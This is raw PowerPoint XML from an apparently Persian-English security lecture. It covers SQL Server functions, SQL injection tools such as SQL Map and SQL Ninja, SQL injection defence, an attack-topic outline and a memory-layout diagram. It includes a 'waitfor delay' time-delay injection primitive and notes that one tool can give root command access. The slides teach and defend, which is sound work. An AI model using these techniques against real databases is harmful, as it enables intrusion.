              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PRINT</a:t>
            </a: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useful as non transactional command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>variable</a:t>
            </a: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local variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>@@</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>variable</a:t>
            </a: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global variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> delay '0:0:10'</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a: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time delay</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="24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4"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36</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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7239000" cy="838200"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="1200" dirty="0" smtClean="0"/>
              <a:t>SQL Injection Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL Map* is a tool that aids in the fingerprinting of a backend database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL Ninja* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://sqlninja.sourceforge.net/ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Aids in the exploitation of SQL injection vulnerabilities can provide root level command access to system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Automagic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> SQL Injector*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Designed to work with generic installation of MS SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://scoobygang.org/magicsql/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Videos on SQL injection can be found on the internet one great source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://securitytube.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Source: EC Council Certified Ethical Hacker Volume 3 Chapter 19</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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37</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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219200" y="152400"/>
            <a:ext cx="6629400"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eaLnBrk="0" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQL Injection Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1447801"/>
            <a:ext cx="8001000" cy="49530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Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>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It is quite simple: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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input validation</a:t>
            </a:r>
            <a:endPar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Enforce "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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strong design</a:t>
            </a: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in new applications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You should audit your existing websites and source code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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38</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>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6477000" cy="685800"/>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fa-IR" smtClean="0"/>
              <a:t>فهرست مطالب</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>سرريز بافر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Buffer Overflow)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>تزريق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(SQL Injection)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>شنود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Sniffing)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>جعل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Spoofing)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>پيوست 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>پيوست 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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228600"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>ساختمان حافظه در هنگام اجراي برنامه ها</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12294" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="1828800"/>
            <a:ext cx="1828800" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12295" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="5486400"/>
            <a:ext cx="1828800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12296" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="5105400"/>
            <a:ext cx="1828800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="5562600"/>
            <a:ext cx="1981200" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Executable Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12299" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4343400"/>
            <a:ext cx="712054" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12300" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2133600"/>
            <a:ext cx="732893" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12301" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="-385781" y="3736459"/>
            <a:ext cx="2634119" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Lower Memory Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 24"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2819400"/>
            <a:ext cx="1828800" cy="1143000"/>
            <a:chOff x="768" y="2400"/>
            <a:chExt cx="1152" cy="720"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12304" name="Line 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="768" y="2400"/>
              <a:ext cx="1152" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12305" name="Line 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="768" y="3120"/>
              <a:ext cx="1152" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12306" name="Line 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
